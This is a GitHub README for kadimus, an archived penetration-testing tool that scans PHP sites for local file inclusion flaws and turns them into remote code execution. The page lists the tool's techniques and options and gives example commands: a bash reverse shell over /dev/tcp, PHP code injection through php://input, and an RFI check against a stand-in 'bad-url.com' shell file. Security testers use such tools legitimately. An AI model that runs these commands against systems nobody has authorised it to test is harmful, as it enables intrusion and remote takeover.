Skip to content
This repository has been archived by the owner on Oct 7, 2020. It is now read-only.

P0cL4bs/kadimus

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
bin
August 20, 2015 17:23
March 15, 2015 18:05
May 25, 2015 11:58
March 14, 2015 20:23

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

LFI Scan & Exploit Tool

kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Source code disclosure
  • Command shell interface through HTTP request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • Proxy socks5 support for remote connections

Compile:

First, make sure you have all dependencies installed in your system: libcurl, libopenssl, libpcre and libssh.

Then you can clone the repository, to get the source code:

$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

And finally:

$ make

Options:

Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry NUMBER              Number of times to retry if connection fails
    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)

  Scanner:
    -u, --url STRING            URL to scan/exploit
    -o, --output FILE           File to save output results

  Explotation:
    --parameter STRING          Parameter name to inject exploit
                                (only needed by RCE data and source disclosure)

  RCE:
    -T, --technique=TECH        LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP request

    --connect STRING            IP/hostname to connect to
    -p, --port NUMBER           Port number to connect to or listen on
    -l, --listen                Bind and listen for incoming connections

    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
    --ssh-target STRING         Set the SSH host

    RCE Available techniques

      environ                   Try to run PHP code using /proc/self/environ
      input                     Try to run PHP code using php://input
      auth                      Try to run PHP code using /var/log/auth.log
      data                      Try to run PHP code using data://text
      expect                    Try to run a command using expect://cmd

    Source Disclosure:
      -S, --source              Try to get the source file using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent

Get source code of file:

./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

Execute php code:

./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors -- just put the remote URL in resource/common_files.txt and the regex to identify them, example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0

Contributing

You can help with code, or by donating. If you want to help with code, use the kernel code style as a reference.

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

About

kadimus is a tool to check and exploit lfi vulnerability.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages